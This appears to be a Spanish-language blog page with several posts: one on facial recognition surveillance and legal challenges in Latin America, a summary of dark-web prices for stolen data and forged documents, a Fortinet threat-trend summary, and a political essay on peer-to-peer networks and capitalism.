Por todos los casos de errores y fallas que hemos visto alrededor del mundo, nos queda claro que la implementación de sistemas de reconocimiento facial puede generar innumerables riesgos al ejercicio de derechos humanos. Sin embargo, algo de que no solemos hablar es el costo que la adquisición y uso de esas tecnologías representan en los bolsillos de las poblaciones donde estos sitemas se implementan.

La situación es particularmente grave en América Latina: a pesar de que el argumento de la crisis económica es constantemente utilizado para explicar la disminución de inversiones en servicios básicos como educación y salud, los gobiernos siguen invirtiendo en vigilancia. Y, peor aún, invierten en tecnologías incapaces de cumplir con sus propias promesas.

Las justificaciones en general vienen de la necesidad de mejorar la seguridad pública, planteando la posibilidad de agilizar la búsqueda de prófugos de la justicia y una identificación más eficaz de delincuentes… Pero los resultados distan de ser los esperados. En 2019, un hombre identificado a través de un sistema de reconocimiento facial estuvo seis días preso por error en Buenos Aires. Lo mismo pasó con una mujer en Río de Janeiro que fue detenida tras ser confundida con otra persona por las cámaras instaladas en algunos barrios de la ciudad, hace alrededor de un año durante el Carnaval.

Nada de eso fue suficiente para impedir que el gobierno del estado de São Paulo decidiera invertir más de 13 millones de dólares (más de 58,6 millones de reales) en la implementación de un sistema de reconocimiento facial para su red de metros. El nuevo sistema puede afectar a millones de personas que circulan diariamente en las líneas donde serán instaladas las cámaras. A pesar de esto, ni el impacto financiero ni el humano fueron considerados suficientemente relevantes para que el proceso de contratación e implementación del sistema incluyera medidas de transparencia y participación. La existencia de obligaciones de rendición de cuentas previstas en la nueva ley general de protección de datos brasileña –que entra en vigencia en agosto de este año– tampoco fue considerada.

Lo sociedad exige explicaciones

Frente a tal situación, seis organizaciones de defensa de derechos brasileñas decidieron presentar -el último 10 de febrero- una acción judicial demandando que se transparentara la información sobre el uso, procesamiento y almacenamiento de datos biométricos, así como las medidas de seguridad que serán implementadas para garantizar la privacidad de los millones de usuarios del metro. Y tuvieron éxito. Tras la solicitud de pruebas anticipada* de la Defensoria Pública do Estado de São Paulo, Defensoria Pública da União (DPU), Instituto Brasileiro de Defesa do Consumidor (Idec), Intervozes, ARTIGO 19, y el Coletivo de Advocacia em Direitos Humanos (CADHu) la Companhia Metropolitano de São Paulo tiene 30 días hábiles** contados desde la notificación a la empresa para entregar la información solicitada.

Estas organizaciones también han manifestado su preocupación por la falta de transparencia en torno a la adquisicón millonaria de tecnologías de vigilancia que han demostrado ser problemáticamente propensas a errores y sesgos en Brasil, así como en otras implementaciones a nivel internacional.

La solicitud de pruebas presentada las organizaciones brasileñas se suma a una serie de movimientos en la región para exigir explicaciones sobre los razonamientos que justifican la compra y adopción de tecnologías de vigilancia basadas en la recolección de datos masiva, así como las medidas que serán adoptadas para mitigar los riesgos que estas implican al ejercicio de los derechos humanos.

En Paraguay, Tedic actualmente cuestiona la inconstitucionalidad de reglamentos presentados para justificar la negativa de acceso a la información sobre un sistema reconocimiento facial que se encuentra implementando desde 2018 y sobre el cual poco se sabe. En Argentina, ADC ha iniciado una acción buscando que se determine la inconstitucionalidad de la resolución que autoriza el sistema de reconocimiento facial en la Ciudad de Buenos Aires, donde se implementaron cerca de 200 cámaras en el espacio público (incluyendo estaciones de metro y trenes).

Si bien no han sido pocos los casos donde se ha expuesto el alto índice de errores que los sistemas de reconocimiento facial han mostrado en su debut como medida de seguridad, es importante destacar que las medidas ya implementadas se han desarrollado sin mecanismos efectivos de rendición de cuentas que permitan auditar y apelar el uso de estas tecnologías en el espacio público; donde sus afectaciones terminan polarizando las brechas de desigualdad y vulnerando aún más a las personas que son perseguidas y reprimidas por parte de sus gobiernos.

Ante la implementación de mecanismos de vigilancia masiva que se anuncian como medida para incrementar la seguridad de las poblaciones donde se despliegan, es importante señalar que ninguna medida puede estar por encima de la obligación de proteger y promover el ejercicio de los derechos humanos.

Desde Derechos Digitales seguimos acompañando y apoyando las acciones tomadas por las organizaciones de Argentina, Brasil y Paraguay esperando que se traduzcan en mayores compromisos de parte de los Estados de la región y sirvan de ejemplo para otros países.

Costos y precios mas bajos del mercado negro en la Internet Obscura

Publicada el 07/04/2020 - 02/08/2021 por Anonymous Chile

En la Internet Obscura se pueden encontrar todo tipo de productos ilegales. En el mercado negro se venden armas, drogas, pornografía infantil, cuentas robadas, información personal, tarjetas de crédito, servicios de hacking, sistemas hackeados, acceso completo a plataformas restringidas y un sinfín de productos que es ilegal vender publicamente. Ahora, un nuevo estudio ha actualizado los precios que se pagan por algunos de los productos robados que más demanda gozan en las profundidades de la World Wide Web.

El pasado año 2019 la empresa Atlas VPN realizó un estudio dividiendo los productos encontrados en cuatro categorías: información que pueda identificar a personas, información financiera robada, documentos falsificados y servicios de hackeo. De entre los productos analizados por Atlas VPN, los números de la Seguridad Social de Estados Unidos son lo más barato que se puede comprar asociado a la identidad de una persona, a pesar de que vienen asociados también a otros datos como el nombre completo de una persona, su número de carnet de conducir, número de pasaporte, número telefónico, dirección domiciliaria y de correo electrónico.

10 dólares por una tarjeta de crédito con hasta 5.000 dólares de saldo

Son numerosos hackeos los que han permitido el robo de estos números únicos asociados a cada estadounidense, y por ello su valor ha caído en picado. Pero eso no quiere decir que no puedan usarse para causar un gran perjuicio, como hacerse pasar por una persona a la hora de contratar un préstamo.

A partir de ahí, los precios empiezan a subir, pero los precios siguen siendo asequibles para algunos productos. Por ejemplo, los datos de una tarjeta de crédito que tenga un balance de entre USD $1.000 y 5.000, cuesta sólo USD $10. De esta forma, los hackers monetizan el robo de una tarjeta en lugar de cometer el delito de extraer y blanquear ellos el dinero. En el caso de las cuentas bancarias de Estados Unidos, el acceso a una de ellas con un balance de al menos USD $10.000 cuesta sólo USD $25.

Los pasaportes también están bastante codiciados, donde una plantilla para uno de Estados Unidos cuesta USD $18, por uno de Canadá son USD $26 y uno de la Unión Europea USD $50. Otros “servicios” incluyen el acceso remoto a un ordenador hackeado, donde por sólo USD $35 podrás acceder al ordenador de otra persona.

Hasta USD $5.000 por un pasaporte europeo

Por último, encontramos los tres elementos más caros de los analizados. El tercer puesto es un ataque DDoS de una hora, aunque no especifican de cuánto tráfico, potencia o intensidad, por un coste de USD $165, mas atacar a un banco o a la web de un gobierno cuesta entre dos y cinco veces más sobretodo si el cliente pide alguna intrusión, vulneración de seguridad o extracción de datos. El segundo puesto es para un carnet de conducir, con un precio de unos USD $1.000. Por último, tenemos lo más caro, que es un pasaporte físico falso por USD $2.980 con uno de Estados Unidos, mientras que uno europeo cuesta hasta USD $5.000.

También hay grandes grupos de hackers que venden sus servicios a otros hackers. Aunque no consiguieron establecer rangos de precio, los servicios vendidos incluían scripts para que un malware consiga saltarse antivirus (y listan qué antivirus), softwares de hacking altamente costosos y efectivos, servicios de intermediación, mulas para transferir dinero entre múltiples cuentas hasta perderle el rastro y servicios que cifren malware para colarse en ordenadores.

Cibercriminales actúan cada vez más por razones políticas y económicas

Publicada el 07/04/2020 - 02/08/2021 por Anonymous Chile

Las tendencias de las amenazas mundiales confirman las intenciones políticas y económicas de los ciberdelincuentes. Así lo afirma el último Índice Global de Amenazas de FortiGuard Labs llevado a cabo por Fortinet. Entre las conclusiones del estudio destaca que los ciberdelincuentes no solo siguen explotando cualquier oportunidad en la infraestructura digital, sino que también están aprovechando al máximo las realidades económicas y políticas mundiales para seguir haciendo realidad sus objetivos.

Así, según el análisis, las tendencias mundiales demuestran que la prevalencia y la detección de las amenazas pueden diferir según la geografía, pero la sofisticación y la automatización de los ataques siguen siendo constantes en todas partes. En este sentido, Derek Manky, Chief, Security Insights & Global Threat Alliances, FortiGuard Labs ha destacado que “en la carrera armamentista cibernética, la comunidad criminal ha tenido a menudo una clara ventaja debido a la creciente brecha en las habilidades cibernéticas, la expansión de la superficie de ataque digital, y el aprovechamiento del elemento sorpresa con tácticas como la ingeniería social. Para adelantarse al ciclo de amenazas cada vez más sofisticadas y automatizadas, las organizaciones necesitan utilizar el mismo tipo de tecnologías y estrategias para defender sus redes que las que usan los delincuentes para atacarlas. Eso implica la adopción de plataformas integradas que aprovechen el poder y los recursos de la inteligencia de amenazas impulsada por la inteligencia artificial y los playbooks para permitir la protección y la visibilidad en toda la infraestructura digital”.

Además, para poder protegerse frente a las ciberamenazas es necesario conocerlas y estar al tanto de todas las novedades:

Las 5 tendencias en ciberamenazas que veremos en los próximos meses

  • Charming Kitten: un gatito no tan encantador

En el cuarto trimestre el índice registró niveles significativos de actividad en las regiones asociadas a Charming Kitten, un grupo de amenazas persistentes avanzadas (APT) vinculado a Irán. Activo desde aproximadamente 2014, el actor de la amenaza ha sido asociado con numerosas campañas de ciberespionaje. La actividad reciente sugiere que ha estado presente en la interrupción de las elecciones, habiendo estado vinculado a una serie de ataques a cuentas de correo electrónico específicas asociadas con una campaña de elecciones presidenciales. Además, se observó que Charming Kitten empleaba cuatro nuevas tácticas contra sus víctimas, todas ellas concebidas para engañarles y que ofrecieran información confidencial.

  • Aumentan los riesgos de seguridad para dispositivos IoT

siguen siendo desafiados por los exploits de software y estas amenazas pueden afectar, de forma inesperada, a dispositivos como las cámaras IP inalámbricas. Esta problemática se expande si los componentes y el software se integran en diferentes dispositivos comerciales vendidos bajo una gran variedad de marcas, a veces por diferentes proveedores. Muchos de estos componentes y servicios se programan a menudo utilizando piezas de código pre-escrito de una variedad de fuentes comunes. Estos componentes comunes y el código pre-escrito son a veces vulnerables al exploit, razón por la cual podemos ver las mismas vulnerabilidades en una amplia gama de dispositivos. La escalabilidad combinada con la incapacidad de parchear fácilmente estos dispositivos es un desafío creciente, y pone de relieve las dificultades de la seguridad de la cadena de suministro. La falta de conocimiento o disponibilidad de parches, la prevalencia de vulnerabilidades en algunos dispositivos IoT y los intentos documentados de “esclavizar” estos dispositivos en redes de bots contribuyeron a que estos exploits ocuparan el tercer puesto, por volumen, de todas las detecciones de IPS durante el trimestre.

  • Las amenazas de los mayores ayudan a las de los jóvenes

En medio de la constante presión por adelantarse a las nuevas amenazas, las organizaciones a veces olvidan que los antiguos explotis y vulnerabilidades realmente no tienen fecha de caducidad, y los agentes de la amenaza seguirán utilizándolas mientras funcionen. Un ejemplo de ello es EternalBlue. El malware se ha ido adaptando a lo largo del tiempo para explotar vulnerabilidades comunes. Se ha utilizado en numerosas campañas, entre las que destacan los ataques de ransomware de WannaCry y NotPetya. Además, el pasado mes de mayo se publicó un parche para BlueKeep, una vulnerabilidad que tenía el potencial de propagarse a la misma velocidad y escala que WannaCry y NotPetya. Y ahora, una nueva versión del troyano EternalBlue Downloader apareció el pasado trimestre con la capacidad de explotar la vulnerabilidad de BlueKeep. Afortunadamente, la actual versión no está completamente neutralizada, lo que obliga a los dispositivos objetivo a bloquearse antes de cargar. Pero si observamos el ciclo de desarrollo tradicional del malware, es probable que determinados ciberdelincuentes dispongan de una versión funcional de este potencialmente devastador paquete de malware en un futuro próximo. Y aunque desde mayo hay disponible un parche para BlueKeep, todavía hay demasiadas organizaciones que no han actualizado esta vulnerabilidad en sus sistemas. El interés continuo y en evolución de los actores de las amenazas en EternalBlue y BlueKeep es un recordatorio para que las organizaciones se aseguren de que sus sistemas estén debidamente parcheados y protegidos contra ambas amenazas.

  • Las tendencias demuestran una nueva perspectiva en el comercio mundial del spam

El spam sigue siendo uno de los principales problemas de las organizaciones y los individuos. El informe de este trimestre combina el volumen de flujo de spam entre las naciones con datos que muestran las ratios de spam enviado vs. spam recibido, revelando visualmente una nueva perspectiva sobre un viejo problema. La mayoría del volumen de spam parece seguir las tendencias económicas y políticas. Por ejemplo, los “socios comerciales de spam” más importantes de los Estados Unidos son Polonia, Rusia, Alemania, Japón y Brasil. Además, en términos de volúmenes de spam exportados desde regiones geográficas, Europa del Este es el mayor productor neto de spam del mundo. La mayoría de los emisores de spam provienen de las subregiones asiáticas. Las subregiones europeas restantes encabezan la lista de las que tienen proporciones negativas netas de correo basura, ya que reciben más de lo que envían, seguidas de América y África.

  • Rastrear las pistas de los cibercriminales para determinar lo que vendrá

El examen de los disparadores de IPS detectados en una región no solo muestra los recursos que se están atacando, sino que también puede indicar en qué podrían centrarse los ciberdelincuentes en el futuro, ya sea porque suficientes de esos ataques tuvieron éxito en última instancia, o simplemente porque hay más de un determinado tipo de tecnología desplegada en algunas regiones. Pero eso no siempre es así. Por ejemplo, la gran mayoría de las implementaciones de ThinkPHP están en China, que tiene casi 10 veces más instalaciones que los EE. UU., según shodan.io. Suponiendo que las empresas parcheen su software más o menos al mismo ritmo en cada región, si una red de bots simplemente buscara instancias vulnerables de ThinkPHP antes de desplegar un exploit, el número de disparadores detectados debería ser mucho mayor en Asia-Pacífico (APAC). Sin embargo, en todo APAC se detectaron sólo un 6% más de disparadores IPS que en Norteamérica a partir de un exploit reciente, lo que indica que esas redes de bots están simplemente desplegando el exploit en cualquier instancia de ThinkPHP que encuentren. Además, cuando se examina de manera similar la detección de malware, la mayoría de las amenazas dirigidas a las organizaciones son macros de Visual Basic for Applications (VBA). Es probable que esto se deba a que siguen siendo eficaces y dando resultados. En general, las detecciones de cosas que no funcionan no permanecerán altas por mucho tiempo y si hay una cantidad significativa de detecciones de algo, alguien está cayendo presa de estos ataques.

A medida que proliferan las aplicaciones y el número de dispositivos conectados amplía el perímetro, se están creando miles de millones de nuevos perímetros que deben ser gestionados y protegidos. Además, las organizaciones se enfrentan a una sofisticación cada vez mayor de los ataques dirigidos contra la infraestructura digital en expansión, incluidos algunos impulsados por la inteligencia artificial y el aprendizaje automático.

Para asegurar eficazmente sus redes distribuidas, las organizaciones deben pasar de proteger solo los perímetros de seguridad a proteger los datos distribuidos en sus nuevos perímetros de red, los usuarios, los sistemas, los dispositivos y las aplicaciones críticas. Solo una plataforma de ciberseguridad diseñada para proporcionar una visibilidad y protección completas en toda la superficie de ataque -incluyendo dispositivos, usuarios, endpoints móviles, entornos multi-nube e infraestructuras SaaS- es capaz de asegurar las redes actuales de rápida evolución impulsadas por la innovación digital.

Además, la necesidad de dar prioridad a la higiene de la ciberseguridad sigue siendo urgente en todo el mundo, ya que las amenazas siguen aumentando de forma exponencial.

El comunismo de pares contra el estado capitalista cliente-servidor

Publicada el 06/04/2020 - 02/08/2021 por Anonymous Chile

La sociedad se compone de relaciones sociales. Estas forman las estructuras que la constituyen. Las redes de computadoras, como los sistemas económicos, pueden entonces describirse en términos de relaciones sociales. Los militantes comunistas han descrito comunidades entre iguales; las redes de pares implementan estas relaciones en su arquitectura. Del mismo modo, el capitalismo depende del privilegio y el control, características que en las redes informáticas sólo pueden ser diseñadas centralizadamente como aplicaciones cliente-servidor. Los sistemas económicos dan forma a las redes que crean, y a la vez que las redes se integran cada vez más a la vida diaria, comienzan a formarla también. Resulta esencial producir una comprensión crítica de la economía política para poder comprender las tendencias emergentes en topologías de red y sus implicaciones sociales.

La historia de Internet ilustra cómo se ha dado este proceso. La Internet comenzó como una red que encarnaba las relaciones de un comunismo de pares; sin embargo, ha sido reconfigurada por el capitalismo en una topología cliente-servidor ineficiente y no libre. La existencia de redes de pares que permiten a los productores colaborar a escala global marcó el comienzo de nuevas formas de producción. Tal producción de pares ha estado hasta ahora contenida en creaciones intangibles e inmateriales, aunque tiene el potencial para extenderse a la producción material y convertirse en una amenaza para la existencia del capitalismo. Para que esto suceda, una alternativa al capitalismo de riesgo debe proveer los medios para adquirir y colocar eficientemente la riqueza colectiva requerida para construir redes libres y sociedades libres.

Necesitamos un comunismo de riesgo, una forma de lucha contra la continua expansión del capitalismo basado en la propiedad, un modelo para la autoorganización de los trabajadores inspirado por la topología de red de pares y los comunes pastoriles históricos.

Las condiciones de la clase trabajadora en la Internet

La única manera de cambiar la sociedad es producir y compartir de forma diferente.

El capitalismo tiene sus formas propias de reproducción: el capitalismo de riesgo. A través del acceso a la riqueza que resulta de la captura continua de plusvalía, los capitalistas ofrecen a las nuevas generaciones de innovadores la chance de convertirse en partners junior de su club, haciéndoles vender el futuro valor productivo de lo que crearon a cambio de la riqueza presente que necesitan para empezar. El valor robado, muerto, del pasado captura el valor no-nato del futuro. Ni los innovadores, ni ninguno de los trabajadores futuros en las organizaciones e industrias que crean, son capaces de retener el valor de su contribución.

Este valor “no retenido” forma la riqueza que se utiliza para capturar la siguiente ola de innovación. Esta riqueza capturada es aplicada por sus dueños privados al control político, para imponer los intereses de los dueños de la propiedad a la sociedad a expensas de los intereses de los trabajadores. Para que la innovación nazca y se desarrolle y para el bien común, necesitamos un comunismo de riesgo. Debemos desarrollar formas de crear y reproducir relaciones de producción basadas en los comunes.

La forma en que el producto del trabajo sea apropiado, por productores basados en los comunes o por apropiadores capitalistas, determinará el tipo de sociedad que tendremos, una basada en la cooperación y el compartir, o una basada en la fuerza y la explotación. La lucha del comunismo de riesgo contra la estratificación de clase no podría ser más vital. Nuestra sociedad no sólo se enfrenta las viejas aflicciones de la pobreza y la injusticia, también se vuelve claro que los niveles de producción requeridos para sostener la acumulación de una pequeña élite nos llevan constantemente a la guerra, e inevitablemente hacia la catástrofe ambiental. Fracasar en lograr una sociedad más igualitaria tiene consecuencias más graves de las que nos podemos permitir. Para triunfar, los espacios, instrumentos y recursos necesarios deben estar disponibilizados como un capital común y ser empleados en la producción por una comunidad dispersa de pares, produciendo y compartiendo como iguales.

La política no es una batalla de ideas; es una batalla de capacidades. Las ideas son poderosas, y su desarrollo e implementación ciertamente puede tener un impacto político; sin embargo, el desarrollo e implementación de las ideas no está determinado por su valor intrínseco, sino por el poder relativo de aquellos que se benefician de la idea contra aquellos a los que amenaza. La capacidad de cambiar un orden social requiere los medios de superar a las capacidades competidoras por, entre otras cosas, la comunicación y el lobby. Estas capacidades son, en su base, capacidades económicas. El cambio requiere entonces la aplicación de riqueza suficiente para superar la de aquellos que resisten ese cambio. Tal riqueza sólo surge de la producción.

Las nuevas formas de producir y compartir, entonces, son la precondición de cualquier cambio en el orden social. Estos nuevos métodos de producir y compartir requieren la creación de nuevas formas de relaciones, nuevas relaciones de producción, para constituir una nueva estructura económica capaz de hacer surgir un nuevo tipo de sociedad. Ningún orden social, sin importar cuan fuerte y despiadadamente impuesto, puede resistir su transformación cuando emergen nuevas formas de producir y compartir.

Resumiendo, la sociedad se compone de vínculos sociales que incluyen relaciones de producción. Las mismas constituyen la organización económica de la sociedad, haciendo surgir estructuras legales y políticas que luego la definen. La vinculación entre compradores y vendedores, inquilinos y dueños, empleado y empleador, aquellos que nacen en la riqueza y el privilegio y aquellos que nacen en la precariedad y la lucha, todos son producto de estas relaciones de producción, que determinan cómo se producen y se comparten las cosas en la sociedad. Aquellos que son capaces de controlar la circulación del producto del trabajo de otros pueden imponer leyes e instituciones sociales que protegen sus intereses. Aquellos que no son capaces de retener el control del producto de su trabajo no son capaces de resistirlas.

El capitalismo depende de la apropiación de valor para subsistir y crecer. La falsa retórica de la “economía de libre mercado” es una pantalla de humo para justificar un sistema de privilegio y explotación, la tal vez mejor llamada “economía de casino”. Ciertamente existen algunos conspicuos ganadores, pero las chances siempre están a favor de la casa. Cualquier intento organizado de vencer las chances será excluido, tal vez violentamente. En una economía libre genuina, la competencia entre productores reduciría el precio de todo al nivel más bajo. Si la mercancía se comercializa en un “mercado” verdaderamente perfecto, entonces la tierra y el capital, como el trabajo, jamás serían capaces de ganar más que el costo de producción. No habría clase alguna exenta de trabajar, porque no habría ingreso capaz de sostenerla.

Para que exista una clase capitalista, el mercado debe ser manipulado, y en efecto, todos los mercados lo son. El capitalismo debe incrementar el precio del capital reteniéndolo del trabajo. En realidad, el “libre mercado” es una imposición de los dueños de la propiedad a los trabajadores, mientras retienen sus propios privilegios. El capital necesita mantener el precio del trabajo lo suficientemente bajo para prevenir que los trabajadores, como clase, sean capaces de retener lo suficiente de sus salarios para adquirir propiedad. Si los trabajadores adquirieran propiedad podrían dejar de vender su trabajo a los capitalistas. El capitalismo, entonces, no puede existir en un mercado libre. La idea de un “libre mercado” es parte de la mitología del capitalismo. No es posible dentro del capitalismo así como poco probable que exista fuera de él.

Si fueran “liberados” de la coerción de los capitalistas en busca de lucro, los productores podrían producir por el valor social, no por el lucro, como lo hacen en sus vidas privadas y familiares, y como lo hacen en comunidades no capitalistas. Esto no quiere decir que en una sociedad libre no exista la competencia, o que sus miembros no buscarán beneficiarse de su trabajo. De hecho, la división del trabajo requerida en una sociedad compleja hace necesarios el intercambio y la reciprocidad. No obstante, la metáfora de “el mercado” tal como es usada en la actualidad no se sostendría.

La “economía de mercado” es, por definición, una economía de la vigilancia, donde las contribuciones a la producción y el consumo deben medirse en detalle. Es una economía de contadores y guardias de seguridad. La contabilidad del valor de cambio en pequeñas y reductoras listas de transacciones valoradas individualmente debe superarse por formas de intercambio más fluidas y generalizadas. El motivo por el que se maximiza el beneficio a partir de la propiedad, que es tan a menudo la fuerza motriz detrás de formas de producción irracionales y destructivas, dará paso a un motivo de producir mucho más fuerte: realizar trabajo con beneficio directo sobre nuestras vidas y nuestra sociedad, una producción que cumpla necesidades y deseos del mundo real.

Los apologistas del capitalismo insistirán que esos motivos son uno y el mismo, que el beneficio es simplemente la recompensa monetaria de producir lo que la comunidad necesita, pero esta relación es por lo menos tenue. Mientras que el elevado precio de los bienes escasos se dirige directamente desde las actividades productivas hacia áreas particulares, la obtención de ganancias de esta producción por parte de los dueños de la propiedad hace muy poco por nuestras necesidades sociales. Cuando la ganancia es lo principal, el precio puede aumentarse o los costos reducirse a través de prácticas de negocio predatorias, explotadoras y anticompetitivas, que no contribuyen a satisfacer las necesidades comunitarias. Cuando los trabajadores son capaces de formar su propio capital, y por lo tanto mantener el producto completo de su trabajo, las motivaciones para perseguir esas prácticas se desvanecen.

Sin la necesidad de contabilizar y medir nuestro consumo y producción para apaciguar a los que imponen el control capitalista, los trabajadores en una sociedad libre tal vez no se molestarían en producir exclusivamente para maximizar la ganancia dentro de una “economía de mercado”. En su lugar, podrían decidir enfocar sus esfuerzos en producir lo que quieren y lo que su comunidad necesita, y estar motivados a compartir los productos de su labor sólo por respeto mutuo. Este tipo de economía no se parece a un “mercado”.

El “mercado” se ha convertido en una metáfora tan penetrante del “intercambio libre” que la sociedad entera es frecuente y acríticamente descrita en términos de un mercado físico. Un mercado físico no es un espacio libre. El control de la ubicación física del mercado ha sido siempre dominio de las jerarquías y la autoridad, y la proximidad al mercado físico es el ejemplo de manual del ingreso no ganado, referido por los economistas como la “renta económica”. El puesto en el mercado es la manifestación física de la división entre productor y consumidor. Ninguna de estas parece ser una característica esencial de una sociedad libre. En lugar de un “libre mercado” idealizado e imposible, una economía de los trabajadores se conceptualizaría mejor como una “economía de red”, donde los participantes independientes intercambian de acuerdo a sus deseos mutuos dentro del contexto de una plataforma común, no controlada centralizadamente por ninguno de ellos, pero compuesta de sus interrelaciones voluntarias.

El capitalismo depende del Estado para imponer control dentro de la economía de red, particularmente para controlar las relaciones a través de canales autorizados, y por lo tanto capturar el valor que de otra forma sería retenido por los productores. Se introducen puntos de control en la trama natural de las relaciones sociales. La “economía de mercado” es entonces la imposición de los términos “no libres” del mercado físico a la sociedad en su conjunto. La distinción entre productor y consumidor debe aplicarse para que la circulación pueda ser controlada. Sólo la jerarquía y la autoridad deben tener acceso privilegiado.

La idea absurda y reduccionista de que debemos concebir a la sociedad misma como un mercado nace de la imaginación del capitalismo, un paraíso para los extorsionadores y corredores de apuestas. Los medios para imponer las relaciones del mercado a la sociedad entera son provistos por el Estado. El rol tradicional del Estado como mediador entre clases en nombre de la clase dominante depende de su soberanía territorial. La habilidad del Estado para imponer control sobre la economía de red depende del hecho de que los participantes actúan principalmente dentro de los límites del Estado. Una vez que la red se expande más allá del Estado tiene el potencial para convertirse en una amenaza para el Estado mismo, al socavar la captura de valor basada en el territorio.

La habilidad del Estado para garantizar títulos y privilegios se basa en su habilidad para asegurar tales ventajas a través del monopolio sobre el uso legítimo de la violencia. Las comunicaciones basadas en redes globales de pares tienen una chance para resistir y evadir la violencia contenida en tales jerarquías. Las relaciones sociales entre comunidades transnacionales, translocales, operan dentro de un espacio extraterritorial, uno donde las operaciones de título y privilegio den lugar a relaciones de interés mutuo y negociación.

Los modos de producción que emplean estructuras similares a las redes de pares poseen relaciones reminiscentes a las de los comunes pastoriles históricos, tierras tenidas en común usadas para mantener el ganado y regulado por derechos antiguos, previos a las leyes y formas de gobierno modernas. Los comunes modernos, sin embargo, no se encuentran en un sólo lugar, sino que abarcan todo el planeta, ofreciendo a nuestra sociedad la esperanza de un camino de salida a la estratificación de clase del capitalismo al menoscabar su lógica de control y extracción. Ejemplos de tal modo de producción en potencia pueden encontrarse a montones.

Las redes de pares, como la Internet, y toda la entrada material e inmaterial que las mantiene corriendo, sirven como un capital común que es usado independientemente por mucha gente. El Software Libre, cuya producción y distribución depende frecuentemente de redes de pares, es un capital común disponible para todos. El Software Libre es producido por productores diversos y distribuidos que contribuyen a él porque ganan mayor valor al usarlo para su propia producción que el valor de sus contribuciones individuales al software. Los ataques populares a las regalías y tasas capturadas por la industria discográfica y fílmica por parte de los usuarios de tecnologías de compartición de archivos nos muestran las dificultades que enfrentan aquellos cuyos ingresos dependen del control de la reproducción. El transporte masivo y la migración internacional han creado comunidades distribuidas que mantienen relaciones interpersonales y, a menudo, económicas informales a través de los límites nacionales.

Todos estos son ejemplos de nuevas relaciones productivas que trascienden las actuales basadas en la propiedad y apuntan a un progreso potencial. El desarrollo de las telecomunicaciones, notablemente la emergencia de redes de pares como la Internet, así como el transporte y migración internacional, crean amplias posibilidades revolucionarias mientras las comunidades dispersas se vuelven capaces de interactuar instantáneamente a escala global. Nuestras vidas y relaciones ya no necesitan confinarse a naciones estado vinculadas a un territorio. Aunque los elementos coercitivos en la jerarquía política y corporativa imponen cada vez más controles draconianos en un intento por prevenir nuestra resistencia a, o la evasión de, tal confinamiento, podemos colocar nuestras esperanzas revolucionarias en la posibilidad de que la escala del cambio es simplemente tan amplia que nunca podrán triunfar del todo.

En proporción a la audaz emergencia de las tecnologías de pares, el software libre y las comunidades internacionales, los obstáculos para el cambio social son increiblemente grandes. Debemos superar la gran acumulación de riqueza de la que la elite capitalista dispone. Esta riqueza les da la habilidad de moldear la sociedad de acuerdo a sus intereses. Para poder cambiar la sociedad debemos expandir activamente el alcance de nuestros comunes, para que nuestras comunidades independientes de pares puedan sostenerse materialmente y resistir los avances del capitalismo.

Cualquier porción de productividad que permitamos que nos saquen retornará en la forma de nuestra propia opresión.

La cabeza de la intervención estatal en la economía de red es la coacción de la propiedad. La propiedad es por naturaleza antagónica de la libertad. La propiedad es la habilidad de controlar bienes productivos a distancia, la habilidad de “adueñarse” de algo que es puesto en uso productivo por otra persona. La propiedad hace posible la subyugación de individuos y comunidades. Donde la propiedad es soberana, no puede haber libertad alguna bajo su dominio. Los dueños de la propiedad escasa pueden negar la vida al no otorgar el acceso a la misma, para entonces poner a los vivos a trabajar como esclavos sin pagarles más que el costo de su reproducción.

En la terminología económica, el ingreso que los dueños reciben, al apropiarse del producto de los trabajadores, se llama renta. El británico David Ricardo, economista político clásico, fue el primero en describir la renta económica a principios del siglo XIX. Dicho simplemente, la renta económica es el ingreso que el dueño de un bien productivo puede ganar sólo por ser su dueño. El dueño gana un ingreso en renta no por hacer algo o alguna forma de contribución, sólo por ser su dueño (Ricardo, 1821). En los términos de Stuart Mill, el recolector de renta gana dinero aun mientras duerme (Stuart Mill, 1909).

Tomen por ejemplo dos edificios idénticos, uno en un centro económico de importancia y otro en una ciudad menor. Ambos fueron construidos con materiales idénticos, ambos requieren la misma cantidad de trabajo para su mantenimiento y no hay diferencia en términos de costos que los dueños deben sobrellevar para poner estos edificios en el mercado, como lugares comerciales o de vivienda. El edificio en la ciudad mayor ganará, sin embargo, más ingresos que el edificio de la ciudad menor, sin tomar en cuenta la cantidad igual de trabajo y gastos necesarios para mantenerlos. Esta diferencia es la renta económica, y no renta en términos del precio que pagás por el alquiler de tu casa. La renta no se recolecta por ninguna contribución a la producción, sino por privilegios legales, como el título de posesión de una ubicación de valor.

Esto no significa que el dueño no contribuya al valor de la propiedad, por ejemplo a través de su mantenimiento, sino que el valor de cualquier contribución que hagan no se calcula como renta, pero por ejemplo, como interés, si incrementa directamente el valor de la propiedad. La renta, en términos económicos, es el ingreso ganado por permitir a otros usar la propiedad; en última instancia, este ingreso se deriva de la porción que el terrateniente reclama de lo que producen los inquilinos como propio. Esto no se refiere solamente a los terratenientes, la renta y la propiedad en el sentido edilicio. Mientras nuestra habilidad para proveernos subsistencia material requiera acceso a la propiedad que forma nuestros “medios de producción”, debemos acordar transferir una porción de lo que producimos a aquellos que nos permiten el acceso a tales medios, o de lo contrario no podríamos vivir.

La porción de la salida productiva de un productor que puede demandarse por el derecho a existir es el total de esa salida productiva menos los costos de subsistencia del productor. Esta es la conclusión alcanzada por David Ricardo en su Sobre los principios de la economía política y los impuestos de 1817 (Ricardo, 1821) y esta es la base de negociación que nos encontramos todos aquellos que nacimos en un mundo enteramente apropiado por otros.

En su “Ensayo sobre los beneficios”, Ricardo argumenta: “El interés del terrateniente siempre se opone al interés de cualquier otra clase de la comunidad” (Ricardo, 1815). Este análisis no se basa en los medios sociales, como la distinción general entre las clases altas y bajas, sino en la relación con los factores de la producción, tierra, trabajo o capital. Este modelo ricardiano provee una base lógica para la idea de que las clases, terrateniente, trabajador y capitalista, tienen intereses diametralmente opuestos.

Que existan clases altas y bajas puede implicar una sociedad injusta, pero esta distinción no necesariamente implica intereses en conflicto y por lo tanto no ofrece una comprensión de la fuente de la estratificación de clase. Como representante de la clase capitalista emergente, Ricardo no intentaba que su crítica de la renta sobre la tierra se extendiera al ingreso ganado por los capitalistas. Los comentaristas críticos como William Thompson y Thomas Hodgsking, los más reconocidos “socialistas ricardianos”, hicieron exactamente eso, argumentando que el lucro obtenido por los capitalistas es tan explotador e inmerecido como la renta de los terratenientes, y que los intereses de los trabajadores se oponen a los intereses tanto de los terratenientes como de los capitalistas. De su trabajo se desprende la crítica del “capitalismo”, un término acuñado como analogía del feudalismo.

